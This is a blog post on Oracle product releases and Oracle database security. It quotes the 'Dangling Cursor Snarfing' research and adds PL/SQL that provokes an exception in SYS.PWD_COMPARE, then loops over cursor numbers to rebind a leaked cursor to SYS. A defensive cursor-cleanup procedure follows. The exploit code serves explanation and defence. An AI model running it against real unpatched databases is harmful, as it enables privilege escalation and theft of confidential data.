TagEdge

Oracle Database 10g Now Supports Windows Vista

If you run Oracle Database on a Windows Vista desktop, the good news is that Oracle has released Oracle Database 10g Enterprise Edition and Standard Edition (EE/SE) for Windows Vista. The download is available from Oracle's site.


Oracle Releases Five Major Product Suites

According to Oracle's press release, Oracle has released new versions of five of its product lines: Oracle E-Business Suite Release 12, Oracle's PeopleSoft Enterprise Release 9.0, Siebel CRM 8.0, JD Edwards EnterpriseOne 8.12 and JD Edwards World A9.1.

Some excerpts from the press release (the product details):

- Oracle E-Business Suite Release 12: Oracle has released 18 new products and 2443 new enhancements to help global businesses think globally for better decision-making, work globally to be more competitive and manage globally to lower cost and increase performance.

- PeopleSoft Enterprise Release 9.0: It included PeopleSoft Enterprise Human Capital Management (HCM) 9.0. PeopleSoft Enterprise Release 9 contains 2 new products and 1478 enhancements. The new release of PeopleSoft Enterprise HCM delivers enterprise-wide talent management capabilities and, like the other applications in PeopleSoft Enterprise 9, leverages Oracle Fusion Middleware to give customers a comprehensive, standards-based platform to address the challenges of disparate technologies and applications.

- Siebel CRM 8: The new release of the Siebel CRM suite offers ten new products and 366 enhancements that extend Oracle’s investment in industry-specific CRM and enable companies to propel business growth through customer-driven business transformation. The new release accelerates user adoption, enhances business responsiveness and delivers increased value to the enterprise with a new task-based user interface, enterprise search capabilities, SOA-enabled CRM and embedded intelligence driving real-time insight at the moment of customer interaction.

- JD Edwards World A9.1: The first major release of JD Edwards World in ten years, this new version offers 4 new products and 1297 enhancements that provide customers with compliance support, operational excellence, technology improvements and capabilities for global operations.

- JD Edwards EnterpriseOne 8.12: Delivered in the spring of 2006, the latest release of JD Edwards EnterpriseOne delivered 5 new products, including a new Operational Sourcing and three new modules for the food and beverage industry, as well as 291 enhancements.

In the bigger picture, one of the best offers Oracle has made to its customers is this: customers can upgrade to the respective new releases without having to re-license their Oracle applications. This may be a first in software history, and in the long term it should help Oracle win the loyalty war for customers.

However, the products above may not be what new customers want to buy; I have always believed that most new customers are waiting for the next release of Oracle Database.


A view on Oracle Security Issues


There are several articles on Oracle security issues; unsurprisingly, you will come across articles on the web with titles such as “Oracle has more flaws than SQL Server” or “Oracle databases four times worse than Microsoft”. I just came across a research paper entitled “Dangling Cursor Snarfing: A New Class of Attack in Oracle” (PDF). Some excerpts:

we’ll now execute it as a low-privileged user, but when we do so we’ll cause an exception in it by passing it too long a string:

CONNECT SCOTT/TIGER
SET SERVEROUTPUT ON
DECLARE
  X VARCHAR(32000);
  I INTEGER;
BEGIN
  -- build a 10000-character string to trip the conversion inside PWD_COMPARE
  FOR I IN 1..10000 LOOP
    X := 'B' || X;
  END LOOP;
  SYS.PWD_COMPARE(X);
END;
/

This results in the following unhandled exception:

CURSOR: 3
DECLARE
*
ERROR at line 1:
ORA-01460: unimplemented or unreasonable conversion requested
ORA-06512: at "SYS.DBMS_SYS_SQL", line 1200
ORA-06512: at "SYS.DBMS_SQL", line 323
ORA-06512: at "SYS.PWD_COMPARE", line 12
ORA-06512: at line 8

The session now has a dangling cursor which can be snarfed by an attacker. Note from the output of PWD_COMPARE that the cursor has a value of 3 in this case. Incidentally, even without seeing that it's 3, an attacker can still “guess” the value for the dangling cursor by going from 1 to n in a loop until they find it. When the attacker finds the dangling cursor, they can then recycle it; in other words they can rebind the username associated with the query and this time use SYS if they so choose.
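The guess-the-cursor-number loop the excerpt describes, written out as an added example; this is not code from the paper or from this blog. It assumes the statement left dangling by the privileged procedure has a single VARCHAR2 column and a bind variable named :NAME (both assumptions, since the page does not show the query), and it only works where DBMS_SQL does not check that the session calling it is the one that owns the cursor, which is what the paper reports for 10g. Patched and later releases reject the rebind with ORA-29471 (DBMS_SQL access denied) instead, so the loop simply finds nothing there.

```sql
-- Added example: scan the session's DBMS_SQL cursor numbers for a handle
-- another (definer-rights) procedure left open, then rebind and re-execute
-- it with that procedure owner's privileges. Run as the low-privileged user
-- right after the privileged procedure raised its unhandled exception.
SET SERVEROUTPUT ON
DECLARE
  v_value  VARCHAR2(4000);
  v_rows   INTEGER;
  v_found  BOOLEAN := FALSE;
BEGIN
  -- Cursor numbers are small per-session integers, so just walk 1..n;
  -- IS_OPEN reports whether a given number is a live handle.
  FOR c IN 1 .. 50 LOOP
    BEGIN
      IF DBMS_SQL.IS_OPEN(c) THEN
        -- ':NAME' is the assumed bind of the leaked query; point it at SYS.
        DBMS_SQL.BIND_VARIABLE(c, ':NAME', 'SYS');
        DBMS_SQL.DEFINE_COLUMN(c, 1, v_value, 4000);
        v_rows := DBMS_SQL.EXECUTE(c);
        IF DBMS_SQL.FETCH_ROWS(c) > 0 THEN
          DBMS_SQL.COLUMN_VALUE(c, 1, v_value);
          DBMS_OUTPUT.PUT_LINE('cursor ' || c || ' snarfed, row: ' || v_value);
          v_found := TRUE;
        END IF;
        DBMS_SQL.CLOSE_CURSOR(c);
        EXIT;
      END IF;
    EXCEPTION
      WHEN OTHERS THEN
        -- ORA-01001 (invalid cursor), ORA-01006 (no such bind) or ORA-29471
        -- (ownership check on patched releases): try the next number.
        NULL;
    END;
  END LOOP;

  IF NOT v_found THEN
    DBMS_OUTPUT.PUT_LINE('no dangling cursor found in 1..50');
  END IF;
END;
/
```

The detail that makes this worth understanding is the privilege boundary: the cursor was parsed inside a procedure running with its definer's rights, so whatever the low-privileged caller executes through that handle runs with the definer's privileges, not the caller's.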

My sense is that the research study above states the attack pessimistically, based on the following two assumptions:

1) The database administrator (DBA) and security managers did not do their job, and hence allowed an attacker a way to steal confidential data.

2) The users' own problems. They failed to close, or improperly closed, the cursors they created, or failed to clean up open cursors. Thus, we need to educate users in using Oracle Database properly.

Given the analysis above, why do we need to blame Oracle? If we patch regularly and secure the database configuration, we will be reasonably protected from the above attack.
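One check worth making on the "close your cursors" point: in the excerpt, the cursor that leaks is opened inside SYS.PWD_COMPARE itself (the ORA-06512 lines show the error unwinding out of DBMS_SQL through PWD_COMPARE), so the cleanup has to happen in that privileged procedure's exception handler, where the caller cannot reach. As an added example that is neither the paper's PWD_COMPARE nor code from this blog, here is the shape of a definer-rights DBMS_SQL procedure that cannot leave a cursor dangling; the table, column, bind name and 30-character limit are assumed for illustration.

```sql
-- Added example: a definer-rights procedure that releases its DBMS_SQL
-- cursor on every exit path, so a caller who provokes an exception never
-- ends up holding a handle parsed with the owner's privileges.
CREATE OR REPLACE PROCEDURE safe_lookup (p_name IN VARCHAR2)
AUTHID DEFINER
AS
  c      INTEGER;          -- DBMS_SQL cursor handle, NULL until opened
  v_val  VARCHAR2(4000);
  v_rows INTEGER;
BEGIN
  -- Reject unreasonable input before any cursor exists, instead of letting
  -- a 10000-character string raise ORA-01460 halfway through the procedure.
  IF p_name IS NULL OR LENGTH(p_name) > 30 THEN
    RAISE_APPLICATION_ERROR(-20001, 'invalid name');
  END IF;

  c := DBMS_SQL.OPEN_CURSOR;
  -- app_secrets / secret are assumed names; the bind keeps p_name out of
  -- the SQL text, so this is not an injection point.
  DBMS_SQL.PARSE(c, 'SELECT secret FROM app_secrets WHERE name = :NAME',
                 DBMS_SQL.NATIVE);
  DBMS_SQL.BIND_VARIABLE(c, ':NAME', p_name);
  DBMS_SQL.DEFINE_COLUMN(c, 1, v_val, 4000);
  v_rows := DBMS_SQL.EXECUTE(c);
  IF DBMS_SQL.FETCH_ROWS(c) > 0 THEN
    DBMS_SQL.COLUMN_VALUE(c, 1, v_val);
    DBMS_OUTPUT.PUT_LINE('value for ' || p_name || ': ' || v_val);
  END IF;
  DBMS_SQL.CLOSE_CURSOR(c);
EXCEPTION
  WHEN OTHERS THEN
    -- Close first, then re-raise: the error still reaches the caller, but
    -- the cursor number it could have recycled is already gone.
    IF c IS NOT NULL AND DBMS_SQL.IS_OPEN(c) THEN
      DBMS_SQL.CLOSE_CURSOR(c);
    END IF;
    RAISE;
END;
/
```

To verify the handler does its job, call the procedure as a low-privileged user with an input that fails (a NULL, or a string over the limit), let the exception propagate, and then check that DBMS_SQL.IS_OPEN returns FALSE for the small cursor numbers in that session. The input check alone is not the fix; the handler is, because any other runtime error in the body would otherwise leak the handle the same way.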

Meanwhile, Oracle has hit back at these security critics with a blog posting responding to the issues. Some excerpts:

Because software engineering is a complex discipline, the absence of security flaws in released software cannot be fully guaranteed. Such flaws may be detected during internal testing, or may be discovered externally by customers and security researchers. Regardless of who discovers these issues, Oracle’s top priority is to efficiently fix those flaws across all supported platforms in order to allow customers to maintain their security posture. This means that Oracle prioritizes those security flaws in order of severity, regardless of how they were discovered, in order to produce the appropriate fix. This also means that we acknowledge all of the vulnerabilities at the time of the issuance of the appropriate fix (for example, at the time of the Critical Patch Update) and we credit security researchers for any vulnerability they discovered in the Critical Patch Update documentation.

However, we do not credit security researchers who disclose the existence of vulnerabilities before a fix is available. We consider such practices, including disclosing “zero day” exploits, to be irresponsible as they can result in needlessly exposing customers to risk of attack.

My view is that it is too early to say Oracle does not care about fixing its bugs; it is just that customers are dissatisfied with Oracle's security record. On the other hand, I really believe Oracle is getting better at managing the vulnerabilities in its products. If there are reports of bugs found in Oracle's products, whom should we find fault with? The researchers, who should bear the social responsibility? Oracle, for not releasing the most up-to-date security patch? Or the customers, who do not patch and secure the configuration of their databases? Moreover, if there had been a large-scale attack targeting Oracle databases, we would definitely have heard of Oracle customers switching to competing products in the market.
